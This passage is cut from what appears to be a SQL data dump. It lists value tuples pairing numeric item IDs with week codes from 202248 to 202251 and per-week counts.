(1711,1,'202248',2),(1713,1,'202248',2),(1715,1,'202248',2),(1724,1,'202248',2),(1734,1,'202248',2),(1770,1,'202248',2),(1774,1,'202248',2),(1778,1,'202248',2),(2161,1,'202248',2),(2252,1,'202248',2),(2993,1,'202248',2),(3092,1,'202248',2),(3097,1,'202248',2),(3245,1,'202248',2),(3247,1,'202248',2),(3253,1,'202248',2),(3257,1,'202248',2),(3267,1,'202248',2),(3269,1,'202248',2),(3271,1,'202248',2),(3275,1,'202248',2),(3282,1,'202248',2),(3287,1,'202248',2),(3479,1,'202248',2),(3482,1,'202248',2),(3531,1,'202248',2),(3746,1,'202248',2),(4368,1,'202248',2),(4400,1,'202248',2),(4432,1,'202248',2),(4582,1,'202248',2),(4587,1,'202248',2),(4648,1,'202248',2),(4712,1,'202248',2),(5046,1,'202248',2),(110,1,'202248',3),(481,1,'202248',3),(482,1,'202248',3),(484,1,'202248',3),(488,1,'202248',3),(1720,1,'202248',3),(1747,1,'202248',3),(1751,1,'202248',3),(1768,1,'202248',3),(1776,1,'202248',3),(1782,1,'202248',3),(2156,1,'202248',3),(2956,1,'202248',3),(3027,1,'202248',3),(3072,1,'202248',3),(3079,1,'202248',3),(3096,1,'202248',3),(3251,1,'202248',3),(3263,1,'202248',3),(3285,1,'202248',3),(3307,1,'202248',3),(3727,1,'202248',3),(3738,1,'202248',3),(3771,1,'202248',3),(3777,1,'202248',3),(4326,1,'202248',3),(4332,1,'202248',3),(4341,1,'202248',3),(4396,1,'202248',3),(4440,1,'202248',3),(4542,1,'202248',3),(4566,1,'202248',3),(4591,1,'202248',3),(4612,1,'202248',3),(4651,1,'202248',3),(4688,1,'202248',3),(4697,1,'202248',3),(4797,1,'202248',3),(4862,1,'202248',3),(4870,1,'202248',3),(4878,1,'202248',3),(4897,1,'202248',3),(5020,1,'202248',3),(5042,1,'202248',3),(5122,1,'202248',3),(479,1,'202248',4),(483,1,'202248',4),(1718,1,'202248',4),(1741,1,'202248',4),(1743,1,'202248',4),(2154,1,'202248',4),(2165,1,'202248',4),(2178,1,'202248',4),(2558,1,'202248',4),(2748,1,'202248',4),(2801,1,'202248',4),(2964,1,'202248',4),(3102,1,'202248',4),(3107,1,'202248',4),(3124,1,'202248',4),(3240,1,'202248',4),(3259,1,'202248',4),(3534,1,'202248',4),(4373,1,'202248',4),(4387,1,'202248',4),(4436,1,'202248',4),(4517,1,'202248',4),(4657,1,'202248',4),(4681,1,'202248',4),(4694,1,'202248',4),(4744,1,'202248',4),(4888,1,'202248',4),(4983,1,'202248',4),(5024,1,'202248',4),(5050,1,'202248',4),(5058,1,'202248',4),(5146,1,'202248',4),(5157,1,'202248',4),(102,1,'202248',5),(467,1,'202248',5),(470,1,'202248',5),(471,1,'202248',5),(476,1,'202248',5),(480,1,'202248',5),(1588,1,'202248',5),(1703,1,'202248',5),(1707,1,'202248',5),(1726,1,'202248',5),(1728,1,'202248',5),(1732,1,'202248',5),(1739,1,'202248',5),(1766,1,'202248',5),(2293,1,'202248',5),(2617,1,'202248',5),(2704,1,'202248',5),(3023,1,'202248',5),(3034,1,'202248',5),(3041,1,'202248',5),(3045,1,'202248',5),(3060,1,'202248',5),(3063,1,'202248',5),(3087,1,'202248',5),(3229,1,'202248',5),(3261,1,'202248',5),(3265,1,'202248',5),(3273,1,'202248',5),(3278,1,'202248',5),(3297,1,'202248',5),(3316,1,'202248',5),(3486,1,'202248',5),(3498,1,'202248',5),(4238,1,'202248',5),(4404,1,'202248',5),(4408,1,'202248',5),(4416,1,'202248',5),(4454,1,'202248',5),(4529,1,'202248',5),(4551,1,'202248',5),(4654,1,'202248',5),(4685,1,'202248',5),(4691,1,'202248',5),(4722,1,'202248',5),(4753,1,'202248',5),(4771,1,'202248',5),(4802,1,'202248',5),(4976,1,'202248',5),(4977,1,'202248',5),(4980,1,'202248',5),(5037,1,'202248',5),(5054,1,'202248',5),(5071,1,'202248',5),(74,1,'202248',6),(468,1,'202248',6),(469,1,'202248',6),(473,1,'202248',6),(1590,1,'202248',6),(1592,1,'202248',6),(1709,1,'202248',6),(1737,1,'202248',6),(2296,1,'202248',6),(2297,1,'202248',6),(2751,1,'202248',6),(2989,1,'202248',6),(3006,1,'202248',6),(3038,1,'202248',6),(3438,1,'202248',6),(3714,1,'202248',6),(3721,1,'202248',6),(3724,1,'202248',6),(3735,1,'202248',6),(3774,1,'202248',6),(4323,1,'202248',6),(4335,1,'202248',6),(4514,1,'202248',6),(4756,1,'202248',6),(4776,1,'202248',6),(4792,1,'202248',6),(4874,1,'202248',6),(4988,1,'202248',6),(5028,1,'202248',6),(5033,1,'202248',6),(5067,1,'202248',6),(5080,1,'202248',6),(5125,1,'202248',6),(478,1,'202248',7),(486,1,'202248',7),(570,1,'202248',7),(1584,1,'202248',7),(2609,1,'202248',7),(2775,1,'202248',7),(2991,1,'202248',7),(3004,1,'202248',7),(3090,1,'202248',7),(3313,1,'202248',7),(3430,1,'202248',7),(3489,1,'202248',7),(3742,1,'202248',7),(3752,1,'202248',7),(4275,1,'202248',7),(4420,1,'202248',7),(4444,1,'202248',7),(4448,1,'202248',7),(4556,1,'202248',7),(4608,1,'202248',7),(4703,1,'202248',7),(4709,1,'202248',7),(4741,1,'202248',7),(4883,1,'202248',7),(4893,1,'202248',7),(5062,1,'202248',7),(5076,1,'202248',7),(5131,1,'202248',7),(5137,1,'202248',7),(5140,1,'202248',7),(87,1,'202248',8),(2159,1,'202248',8),(2769,1,'202248',8),(2813,1,'202248',8),(2965,1,'202248',8),(3005,1,'202248',8),(3226,1,'202248',8),(4301,1,'202248',8),(4391,1,'202248',8),(4428,1,'202248',8),(4660,1,'202248',8),(4750,1,'202248',8),(4759,1,'202248',8),(4765,1,'202248',8),(4768,1,'202248',8),(5153,1,'202248',8),(335,1,'202248',9),(472,1,'202248',9),(474,1,'202248',9),(477,1,'202248',9),(487,1,'202248',9),(1606,1,'202248',9),(2309,1,'202248',9),(2457,1,'202248',9),(2658,1,'202248',9),(2911,1,'202248',9),(4706,1,'202248',9),(4747,1,'202248',9),(5101,1,'202248',9),(5128,1,'202248',9),(2804,1,'202248',10),(3117,1,'202248',10),(3710,1,'202248',10),(4329,1,'202248',10),(4524,1,'202248',10),(4996,1,'202248',10),(1604,1,'202248',11),(4412,1,'202248',11),(4762,1,'202248',11),(5134,1,'202248',11),(1598,1,'202248',12),(1722,1,'202248',12),(1745,1,'202248',12),(2503,1,'202248',12),(3290,1,'202248',12),(91,1,'202248',13),(108,1,'202248',13),(3083,1,'202248',13),(3781,1,'202248',13),(4674,1,'202248',13),(4930,1,'202248',13),(76,1,'202248',14),(4663,1,'202248',15),(84,1,'202248',16),(1600,1,'202248',16),(3069,1,'202248',16),(4457,1,'202248',16),(5163,1,'202248',16),(1608,1,'202248',17),(4338,1,'202248',18),(1582,1,'202248',19),(1612,1,'202248',19),(1614,1,'202248',19),(3764,1,'202248',19),(4645,1,'202248',19),(4677,1,'202248',19),(1544,1,'202248',20),(1602,1,'202248',20),(4700,1,'202248',20),(68,1,'202248',21),(89,1,'202248',21),(72,1,'202248',22),(2809,1,'202248',22),(1610,1,'202248',23),(1596,1,'202248',24),(3066,1,'202248',24),(4520,1,'202248',25),(1594,1,'202248',26),(2904,1,'202248',26),(1586,1,'202248',27),(3030,1,'202248',27),(80,1,'202248',79),(9,1,'202248',602),(3714,1,'202249',1),(1709,1,'202249',2),(1732,1,'202249',2),(3041,1,'202249',2),(4329,1,'202249',2),(4428,1,'202249',2),(4688,1,'202249',2),(4691,1,'202249',2),(4874,1,'202249',2),(1695,1,'202249',3),(1703,1,'202249',3),(1711,1,'202249',3),(1715,1,'202249',3),(1734,1,'202249',3),(2156,1,'202249',3),(2161,1,'202249',3),(2751,1,'202249',3),(2993,1,'202249',3),(3006,1,'202249',3),(3092,1,'202249',3),(3096,1,'202249',3),(3117,1,'202249',3),(3124,1,'202249',3),(3297,1,'202249',3),(3430,1,'202249',3),(3489,1,'202249',3),(3752,1,'202249',3),(3777,1,'202249',3),(4332,1,'202249',3),(4747,1,'202249',3),(4750,1,'202249',3),(4759,1,'202249',3),(4762,1,'202249',3),(4893,1,'202249',3),(5042,1,'202249',3),(5101,1,'202249',3),(106,1,'202249',4),(110,1,'202249',4),(476,1,'202249',4),(481,1,'202249',4),(488,1,'202249',4),(1590,1,'202249',4),(1697,1,'202249',4),(1726,1,'202249',4),(1739,1,'202249',4),(1776,1,'202249',4),(1782,1,'202249',4),(2152,1,'202249',4),(2252,1,'202249',4),(2293,1,'202249',4),(2296,1,'202249',4),(2704,1,'202249',4),(2801,1,'202249',4),(2911,1,'202249',4),(2956,1,'202249',4),(2965,1,'202249',4),(3087,1,'202249',4),(3107,1,'202249',4),(3226,1,'202249',4),(3229,1,'202249',4),(3249,1,'202249',4),(3282,1,'202249',4),(3290,1,'202249',4),(3479,1,'202249',4),(3531,1,'202249',4),(3724,1,'202249',4),(3727,1,'202249',4),(3731,1,'202249',4),(3738,1,'202249',4),(3771,1,'202249',4),(4335,1,'202249',4),(4373,1,'202249',4),(4432,1,'202249',4),(4436,1,'202249',4),(4448,1,'202249',4),(4524,1,'202249',4),(4551,1,'202249',4),(4681,1,'202249',4),(4694,1,'202249',4),(4712,1,'202249',4),(4741,1,'202249',4),(4753,1,'202249',4),(4768,1,'202249',4),(4883,1,'202249',4),(5024,1,'202249',4),(5037,1,'202249',4),(5050,1,'202249',4),(5067,1,'202249',4),(5122,1,'202249',4),(5140,1,'202249',4),(102,1,'202249',5),(479,1,'202249',5),(480,1,'202249',5),(482,1,'202249',5),(483,1,'202249',5),(484,1,'202249',5),(486,1,'202249',5),(1701,1,'202249',5),(1705,1,'202249',5),(1707,1,'202249',5),(1713,1,'202249',5),(1720,1,'202249',5),(1749,1,'202249',5),(2063,1,'202249',5),(2148,1,'202249',5),(2159,1,'202249',5),(2248,1,'202249',5),(2558,1,'202249',5),(2813,1,'202249',5),(2989,1,'202249',5),(2991,1,'202249',5),(3034,1,'202249',5),(3038,1,'202249',5),(3063,1,'202249',5),(3109,1,'202249',5),(3243,1,'202249',5),(3247,1,'202249',5),(3251,1,'202249',5),(3257,1,'202249',5),(3261,1,'202249',5),(3263,1,'202249',5),(3265,1,'202249',5),(3313,1,'202249',5),(3316,1,'202249',5),(3498,1,'202249',5),(3746,1,'202249',5),(4275,1,'202249',5),(4326,1,'202249',5),(4368,1,'202249',5),(4387,1,'202249',5),(4391,1,'202249',5),(4396,1,'202249',5),(4404,1,'202249',5),(4412,1,'202249',5),(4440,1,'202249',5),(4556,1,'202249',5),(4582,1,'202249',5),(4608,1,'202249',5),(4668,1,'202249',5),(4792,1,'202249',5),(4858,1,'202249',5),(4878,1,'202249',5),(4977,1,'202249',5),(4983,1,'202249',5),(5020,1,'202249',5),(5033,1,'202249',5),(5046,1,'202249',5),(5062,1,'202249',5),(5080,1,'202249',5),(5125,1,'202249',5),(471,1,'202249',6),(477,1,'202249',6),(478,1,'202249',6),(1592,1,'202249',6),(1724,1,'202249',6),(1730,1,'202249',6),(1741,1,'202249',6),(1743,1,'202249',6),(1747,1,'202249',6),(1751,1,'202249',6),(1772,1,'202249',6),(2150,1,'202249',6),(2609,1,'202249',6),(2617,1,'202249',6),(3023,1,'202249',6),(3045,1,'202249',6),(3072,1,'202249',6),(3079,1,'202249',6),(3097,1,'202249',6),(3127,1,'202249',6),(3245,1,'202249',6),(3259,1,'202249',6),(3267,1,'202249',6),(3269,1,'202249',6),(3271,1,'202249',6),(3278,1,'202249',6),(3307,1,'202249',6),(3438,1,'202249',6),(3534,1,'202249',6),(3721,1,'202249',6),(3749,1,'202249',6),(4323,1,'202249',6),(4357,1,'202249',6),(4382,1,'202249',6),(4400,1,'202249',6),(4408,1,'202249',6),(4420,1,'202249',6),(4424,1,'202249',6),(4514,1,'202249',6),(4517,1,'202249',6),(4546,1,'202249',6),(4591,1,'202249',6),(4612,1,'202249',6),(4651,1,'202249',6),(4685,1,'202249',6),(4756,1,'202249',6),(4776,1,'202249',6),(4797,1,'202249',6),(4802,1,'202249',6),(4862,1,'202249',6),(4870,1,'202249',6),(4888,1,'202249',6),(4980,1,'202249',6),(5054,1,'202249',6),(5058,1,'202249',6),(5071,1,'202249',6),(5128,1,'202249',6),(5153,1,'202249',6),(5157,1,'202249',6),(570,1,'202249',7),(1584,1,'202249',7),(1604,1,'202249',7),(1699,1,'202249',7),(1718,1,'202249',7),(1774,1,'202249',7),(1778,1,'202249',7),(2804,1,'202249',7),(3027,1,'202249',7),(3090,1,'202249',7),(3240,1,'202249',7),(3280,1,'202249',7),(3287,1,'202249',7),(3486,1,'202249',7),(3742,1,'202249',7),(3774,1,'202249',7),(4301,1,'202249',7),(4377,1,'202249',7),(4454,1,'202249',7),(4529,1,'202249',7),(4542,1,'202249',7),(4648,1,'202249',7),(4722,1,'202249',7),(4744,1,'202249',7),(4771,1,'202249',7),(4897,1,'202249',7),(4976,1,'202249',7),(5028,1,'202249',7),(467,1,'202249',8),(470,1,'202249',8),(474,1,'202249',8),(1745,1,'202249',8),(1768,1,'202249',8),(2165,1,'202249',8),(2297,1,'202249',8),(2503,1,'202249',8),(2748,1,'202249',8),(2769,1,'202249',8),(2964,1,'202249',8),(3060,1,'202249',8),(3275,1,'202249',8),(3285,1,'202249',8),(3541,1,'202249',8),(3710,1,'202249',8),(3735,1,'202249',8),(4341,1,'202249',8),(4566,1,'202249',8),(4697,1,'202249',8),(4700,1,'202249',8),(4996,1,'202249',8),(5146,1,'202249',8),(74,1,'202249',9),(108,1,'202249',9),(485,1,'202249',9),(1594,1,'202249',9),(1770,1,'202249',9),(1780,1,'202249',9),(2154,1,'202249',9),(2178,1,'202249',9),(3069,1,'202249',9),(3104,1,'202249',9),(3482,1,'202249',9),(4238,1,'202249',9),(4587,1,'202249',9),(4654,1,'202249',9),(4709,1,'202249',9),(4988,1,'202249',9),(5131,1,'202249',9),(5137,1,'202249',9),(335,1,'202249',10),(468,1,'202249',10),(469,1,'202249',10),(1600,1,'202249',10),(1608,1,'202249',10),(1614,1,'202249',10),(1722,1,'202249',10),(2775,1,'202249',10),(3005,1,'202249',10),(3273,1,'202249',10),(4416,1,'202249',10),(4660,1,'202249',10),(4703,1,'202249',10),(4765,1,'202249',10),(5076,1,'202249',10),(473,1,'202249',11),(487,1,'202249',11),(1598,1,'202249',11),(1728,1,'202249',11),(1737,1,'202249',11),(2658,1,'202249',11),(3004,1,'202249',11),(3102,1,'202249',11),(3253,1,'202249',11),(4338,1,'202249',11),(4520,1,'202249',11),(4657,1,'202249',11),(4674,1,'202249',11),(4930,1,'202249',11),(87,1,'202249',12),(1588,1,'202249',12),(3083,1,'202249',12),(4866,1,'202249',12),(84,1,'202249',13),(472,1,'202249',13),(2457,1,'202249',13),(3066,1,'202249',13),(4444,1,'202249',13),(76,1,'202249',14),(1766,1,'202249',14),(3781,1,'202249',14),(5134,1,'202249',14),(1610,1,'202249',15),(2309,1,'202249',15),(4677,1,'202249',15),(4706,1,'202249',15),(1606,1,'202249',17),(4663,1,'202249',17),(1596,1,'202249',18),(1602,1,'202249',18),(4457,1,'202249',18),(68,1,'202249',19),(1612,1,'202249',19),(2904,1,'202249',19),(2809,1,'202249',20),(3030,1,'202249',20),(89,1,'202249',21),(4645,1,'202249',23),(5163,1,'202249',23),(91,1,'202249',24),(72,1,'202249',25),(1544,1,'202249',25),(1582,1,'202249',26),(3764,1,'202249',27),(1586,1,'202249',33),(4363,1,'202249',37),(80,1,'202249',87),(9,1,'202249',514),(106,1,'202250',1),(1701,1,'202250',1),(1705,1,'202250',1),(1709,1,'202250',1),(1751,1,'202250',1),(1768,1,'202250',1),(1772,1,'202250',1),(2165,1,'202250',1),(2178,1,'202250',1),(2748,1,'202250',1),(2769,1,'202250',1),(3004,1,'202250',1),(3023,1,'202250',1),(3045,1,'202250',1),(3069,1,'202250',1),(3127,1,'202250',1),(3226,1,'202250',1),(3229,1,'202250',1),(3251,1,'202250',1),(3261,1,'202250',1),(3265,1,'202250',1),(3275,1,'202250',1),(3278,1,'202250',1),(3280,1,'202250',1),(3282,1,'202250',1),(3287,1,'202250',1),(3297,1,'202250',1),(3316,1,'202250',1),(3482,1,'202250',1),(3531,1,'202250',1),(3541,1,'202250',1),(3724,1,'202250',1),(3727,1,'202250',1),(3731,1,'202250',1),(3738,1,'202250',1),(4275,1,'202250',1),(4368,1,'202250',1),(4373,1,'202250',1),(4377,1,'202250',1),(4382,1,'202250',1),(4387,1,'202250',1),(4416,1,'202250',1),(4424,1,'202250',1),(4432,1,'202250',1),(4440,1,'202250',1),(4448,1,'202250',1),(4514,1,'202250',1),(4712,1,'202250',1),(4744,1,'202250',1),(4756,1,'202250',1),(4771,1,'202250',1),(4797,1,'202250',1),(4802,1,'202250',1),(4862,1,'202250',1),(4878,1,'202250',1),(4888,1,'202250',1),(4893,1,'202250',1),(4983,1,'202250',1),(102,1,'202250',2),(1697,1,'202250',2),(1713,1,'202250',2),(1734,1,'202250',2),(1749,1,'202250',2),(1774,1,'202250',2),(1776,1,'202250',2),(2063,1,'202250',2),(2150,1,'202250',2),(2152,1,'202250',2),(2154,1,'202250',2),(2156,1,'202250',2),(2248,1,'202250',2),(2558,1,'202250',2),(2609,1,'202250',2),(2617,1,'202250',2),(2775,1,'202250',2),(2965,1,'202250',2),(2993,1,'202250',2),(3041,1,'202250',2),(3063,1,'202250',2),(3104,1,'202250',2),(3107,1,'202250',2),(3109,1,'202250',2),(3245,1,'202250',2),(3249,1,'202250',2),(3269,1,'202250',2),(3271,1,'202250',2),(3486,1,'202250',2),(3534,1,'202250',2),(3721,1,'202250',2),(3735,1,'202250',2),(3749,1,'202250',2),(3752,1,'202250',2),(4238,1,'202250',2),(4326,1,'202250',2),(4329,1,'202250',2),(4341,1,'202250',2),(4400,1,'202250',2),(4517,1,'202250',2),(4551,1,'202250',2),(4582,1,'202250',2),(4741,1,'202250',2),(4747,1,'202250',2),(4753,1,'202250',2),(4759,1,'202250',2),(4870,1,'202250',2),(4897,1,'202250',2),(4977,1,'202250',2),(4980,1,'202250',2),(5028,1,'202250',2),(5042,1,'202250',2),(5054,1,'202250',2),(5058,1,'202250',2),(480,1,'202250',3),(481,1,'202250',3),(483,1,'202250',3),(484,1,'202250',3),(570,1,'202250',3),(1695,1,'202250',3),(1707,1,'202250',3),(1711,1,'202250',3),(1715,1,'202250',3),(1730,1,'202250',3),(1732,1,'202250',3),(1739,1,'202250',3),(1741,1,'202250',3),(1743,1,'202250',3),(1770,1,'202250',3),(2252,1,'202250',3),(2751,1,'202250',3),(2964,1,'202250',3),(3006,1,'202250',3),(3027,1,'202250',3),(3087,1,'202250',3),(3263,1,'202250',3),(3267,1,'202250',3),(3273,1,'202250',3),(3771,1,'202250',3),(3777,1,'202250',3),(4332,1,'202250',3),(4335,1,'202250',3),(4420,1,'202250',3),(4428,1,'202250',3),(4436,1,'202250',3),(4556,1,'202250',3),(4566,1,'202250',3),(4587,1,'202250',3),(4591,1,'202250',3),(4651,1,'202250',3),(4681,1,'202250',3),(4694,1,'202250',3),(4762,1,'202250',3),(4874,1,'202250',3),(5024,1,'202250',3),(5037,1,'202250',3),(5146,1,'202250',3),(5153,1,'202250',3),(476,1,'202250',4),(1718,1,'202250',4),(1720,1,'202250',4),(1726,1,'202250',4),(1778,1,'202250',4),(1782,1,'202250',4),(2148,1,'202250',4),(2159,1,'202250',4),(2297,1,'202250',4),(2956,1,'202250',4),(2991,1,'202250',4),(3090,1,'202250',4),(3096,1,'202250',4),(3124,1,'202250',4),(3247,1,'202250',4),(3253,1,'202250',4),(3290,1,'202250',4),(3430,1,'202250',4),(3746,1,'202250',4),(4301,1,'202250',4),(4391,1,'202250',4),(4444,1,'202250',4),(4542,1,'202250',4),(4608,1,'202250',4),(4685,1,'202250',4),(4688,1,'202250',4),(5033,1,'202250',4),(5050,1,'202250',4),(5125,1,'202250',4),(467,1,'202250',5),(478,1,'202250',5),(488,1,'202250',5),(1592,1,'202250',5),(1766,1,'202250',5),(2161,1,'202250',5),(2296,1,'202250',5),(2704,1,'202250',5),(2801,1,'202250',5),(3005,1,'202250',5),(3038,1,'202250',5),(3102,1,'202250',5),(3117,1,'202250',5),(3307,1,'202250',5),(3498,1,'202250',5),(3710,1,'202250',5),(4408,1,'202250',5),(4412,1,'202250',5),(4668,1,'202250',5),(4691,1,'202250',5),(5020,1,'202250',5),(5062,1,'202250',5),(5101,1,'202250',5),(5122,1,'202250',5),(469,1,'202250',6),(472,1,'202250',6),(477,1,'202250',6),(485,1,'202250',6),(1584,1,'202250',6),(1590,1,'202250',6),(1606,1,'202250',6),(1614,1,'202250',6),(1699,1,'202250',6),(1703,1,'202250',6),(1745,1,'202250',6),(2989,1,'202250',6),(3243,1,'202250',6),(3313,1,'202250',6),(3714,1,'202250',6),(4529,1,'202250',6),(4996,1,'202250',6),(5067,1,'202250',6),(5080,1,'202250',6),(5128,1,'202250',6),(5131,1,'202250',6),(471,1,'202250',7),(474,1,'202250',7),(1596,1,'202250',7),(1608,1,'202250',7),(1722,1,'202250',7),(1724,1,'202250',7),(2804,1,'202250',7),(2911,1,'202250',7),(3079,1,'202250',7),(3092,1,'202250',7),(3479,1,'202250',7),(3742,1,'202250',7),(4454,1,'202250',7),(4654,1,'202250',7),(4657,1,'202250',7),(4660,1,'202250',7),(4700,1,'202250',7),(4776,1,'202250',7),(4988,1,'202250',7),(5046,1,'202250',7),(5071,1,'202250',7),(5076,1,'202250',7),(5157,1,'202250',7),(74,1,'202250',8),(468,1,'202250',8),(1598,1,'202250',8),(1604,1,'202250',8),(1728,1,'202250',8),(2457,1,'202250',8),(3072,1,'202250',8),(4524,1,'202250',8),(4697,1,'202250',8),(4709,1,'202250',8),(4722,1,'202250',8),(5137,1,'202250',8),(5140,1,'202250',8),(2309,1,'202250',9),(3489,1,'202250',9),(4338,1,'202250',9),(4612,1,'202250',9),(4976,1,'202250',9),(5134,1,'202250',9),(87,1,'202250',10),(470,1,'202250',10),(473,1,'202250',10),(479,1,'202250',10),(482,1,'202250',10),(1737,1,'202250',10),(2813,1,'202250',10),(4765,1,'202250',10),(335,1,'202250',11),(487,1,'202250',11),(1600,1,'202250',11),(2503,1,'202250',11),(2658,1,'202250',11),(3060,1,'202250',11),(4520,1,'202250',11),(4674,1,'202250',11),(4703,1,'202250',11),(5248,1,'202250',11),(3066,1,'202250',12),(3083,1,'202250',12),(486,1,'202250',13),(3781,1,'202250',13),(108,1,'202250',14),(4706,1,'202250',14),(4930,1,'202250',14),(84,1,'202250',15),(1610,1,'202250',15),(4457,1,'202250',16),(1544,1,'202250',17),(4663,1,'202250',17),(4677,1,'202250',17),(1588,1,'202250',18),(2809,1,'202250',18),(3030,1,'202250',18),(3764,1,'202250',18),(1582,1,'202250',20),(4645,1,'202250',20),(76,1,'202250',21),(5163,1,'202250',21),(91,1,'202250',22),(1586,1,'202250',22),(1602,1,'202250',23),(89,1,'202250',25),(68,1,'202250',26),(1594,1,'202250',26),(72,1,'202250',27),(1612,1,'202250',28),(2904,1,'202250',36),(80,1,'202250',97),(9,1,'202250',645),(110,1,'202251',1),(1695,1,'202251',1),(1701,1,'202251',1),(1720,1,'202251',1),(1726,1,'202251',1),(1734,1,'202251',1),(1772,1,'202251',1),(2154,1,'202251',1),(2248,1,'202251',1),(2751,1,'202251',1),(2993,1,'202251',1),(3096,1,'202251',1),(3124,1,'202251',1),(3240,1,'202251',1),(3249,1,'202251',1),(3257,1,'202251',1),(3259,1,'202251',1),(3285,1,'202251',1),(3287,1,'202251',1),(3746,1,'202251',1),(3749,1,'202251',1),(4326,1,'202251',1),(4332,1,'202251',1),(4368,1,'202251',1),(4373,1,'202251',1),(4382,1,'202251',1),(4408,1,'202251',1),(4424,1,'202251',1),(4591,1,'202251',1),(4691,1,'202251',1),(4858,1,'202251',1),(4870,1,'202251',1),(106,1,'202251',2),(470,1,'202251',2),(471,1,'202251',2),(1697,1,'202251',2),(1699,1,'202251',2),(1715,1,'202251',2),(1730,1,'202251',2),(1743,1,'202251',2),(1747,1,'202251',2),(1768,1,'202251',2),(1770,1,'202251',2),(1774,1,'202251',2),(1778,1,'202251',2),(2148,1,'202251',2),(2152,1,'202251',2),(2161,1,'202251',2),(3034,1,'202251',2),(3092,1,'202251',2),(3107,1,'202251',2),(3109,1,'202251',2),(3127,1,'202251',2),(3247,1,'202251',2),(3267,1,'202251',2),(3278,1,'202251',2),(3280,1,'202251',2),(3282,1,'202251',2),(3297,1,'202251',2),(3479,1,'202251',2),(3489,1,'202251',2),(3531,1,'202251',2),(3541,1,'202251',2),(3724,1,'202251',2),(3727,1,'202251',2),(3735,1,'202251',2),(4335,1,'202251',2),(4377,1,'202251',2),(4432,1,'202251',2),(4448,1,'202251',2),(4688,1,'202251',2),(4741,1,'202251',2),(4792,1,'202251',2),(4797,1,'202251',2),(4802,1,'202251',2),(4862,1,'202251',2),(4866,1,'202251',2),(4878,1,'202251',2),(4883,1,'202251',2),(4888,1,'202251',2),(102,1,'202251',3),(481,1,'202251',3),(488,1,'202251',3),(1705,1,'202251',3),(1707,1,'202251',3),(1711,1,'202251',3),(1732,1,'202251',3),(1739,1,'202251',3),(1741,1,'202251',3),(1751,1,'202251',3),(1776,1,'202251',3),(1782,1,'202251',3),(2063,1,'202251',3),(2150,1,'202251',3),(2156,1,'202251',3),(2252,1,'202251',3),(2293,1,'202251',3),(2296,1,'202251',3),(2558,1,'202251',3),(2609,1,'202251',3),(2748,1,'202251',3),(2965,1,'202251',3),(2991,1,'202251',3),(3063,1,'202251',3),(3090,1,'202251',3),(3097,1,'202251',3),(3226,1,'202251',3),(3229,1,'202251',3),(3251,1,'202251',3),(3263,1,'202251',3),(3265,1,'202251',3),(3271,1,'202251',3),(3273,1,'202251',3),(3290,1,'202251',3),(3316,1,'202251',3),(3430,1,'202251',3),(3721,1,'202251',3),(3738,1,'202251',3),(3752,1,'202251',3),(4329,1,'202251',3),(4341,1,'202251',3),(4363,1,'202251',3),(4400,1,'202251',3),(4440,1,'202251',3),(4546,1,'202251',3),(4582,1,'202251',3),(4648,1,'202251',3),(4651,1,'202251',3),(4654,1,'202251',3),(4681,1,'202251',3),(4685,1,'202251',3),(4703,1,'202251',3),(4722,1,'202251',3),(4747,1,'202251',3),(4750,1,'202251',3),(4893,1,'202251',3),(4983,1,'202251',3),(5024,1,'202251',3),(5046,1,'202251',3),(5050,1,'202251',3),(5146,1,'202251',3),(5248,1,'202251',3),(474,1,'202251',4),(476,1,'202251',4),(478,1,'202251',4),(479,1,'202251',4),(482,1,'202251',4),(484,1,'202251',4),(1584,1,'202251',4),(1590,1,'202251',4),(1703,1,'202251',4),(1713,1,'202251',4),(1780,1,'202251',4),(2165,1,'202251',4),(2178,1,'202251',4),(2704,1,'202251',4),(2775,1,'202251',4),(2801,1,'202251',4),(3006,1,'202251',4),(3027,1,'202251',4),(3060,1,'202251',4),(3069,1,'202251',4),(3079,1,'202251',4),(3104,1,'202251',4),(3243,1,'202251',4),(3245,1,'202251',4),(3253,1,'202251',4),(3275,1,'202251',4),(3534,1,'202251',4),(3731,1,'202251',4),(3777,1,'202251',4),(4275,1,'202251',4),(4387,1,'202251',4),(4396,1,'202251',4),(4404,1,'202251',4),(4416,1,'202251',4),(4428,1,'202251',4),(4514,1,'202251',4),(4517,1,'202251',4),(4551,1,'202251',4),(4556,1,'202251',4),(4566,1,'202251',4),(4587,1,'202251',4),(4668,1,'202251',4),(4712,1,'202251',4),(4744,1,'202251',4),(4753,1,'202251',4),(4897,1,'202251',4),(4976,1,'202251',4),(5020,1,'202251',4),(5062,1,'202251',4),(5067,1,'202251',4),(5153,1,'202251',4),(5157,1,'202251',4),(467,1,'202251',5),(469,1,'202251',5),(477,1,'202251',5),(480,1,'202251',5),(485,1,'202251',5),(1709,1,'202251',5),(1722,1,'202251',5),(1745,1,'202251',5),(1749,1,'202251',5),(2297,1,'202251',5),(2989,1,'202251',5),(3004,1,'202251',5),(3072,1,'202251',5),(3087,1,'202251',5),(3117,1,'202251',5),(3269,1,'202251',5),(3438,1,'202251',5),(3482,1,'202251',5),(3498,1,'202251',5),(3714,1,'202251',5),(3771,1,'202251',5),(4301,1,'202251',5),(4323,1,'202251',5),(4420,1,'202251',5),(4436,1,'202251',5),(4542,1,'202251',5),(4608,1,'202251',5),(4612,1,'202251',5),(4762,1,'202251',5),(4771,1,'202251',5),(4776,1,'202251',5),(4874,1,'202251',5),(4977,1,'202251',5),(4980,1,'202251',5),(4988,1,'202251',5),(473,1,'202251',6),(483,1,'202251',6),(1724,1,'202251',6),(2617,1,'202251',6),(2813,1,'202251',6),(2956,1,'202251',6),(2964,1,'202251',6),(3038,1,'202251',6),(3041,1,'202251',6),(3045,1,'202251',6),(3307,1,'202251',6),(3486,1,'202251',6),(3742,1,'202251',6),(4357,1,'202251',6),(4657,1,'202251',6),(4660,1,'202251',6),(4697,1,'202251',6),(4709,1,'202251',6),(4756,1,'202251',6),(4759,1,'202251',6),(4765,1,'202251',6),(4768,1,'202251',6),(4996,1,'202251',6),(5028,1,'202251',6),(5054,1,'202251',6),(5071,1,'202251',6),(5080,1,'202251',6),(5131,1,'202251',6),(486,1,'202251',7),(1592,1,'202251',7),(1596,1,'202251',7),(1598,1,'202251',7),(2309,1,'202251',7),(3102,1,'202251',7),(3710,1,'202251',7),(3774,1,'202251',7),(4391,1,'202251',7),(4444,1,'202251',7),(4454,1,'202251',7),(4694,1,'202251',7),(4706,1,'202251',7),(5033,1,'202251',7),(5042,1,'202251',7),(5058,1,'202251',7),(5101,1,'202251',7),(5122,1,'202251',7),(5125,1,'202251',7),(5137,1,'202251',7),(335,1,'202251',8),(468,1,'202251',8),(1614,1,'202251',8),(1728,1,'202251',8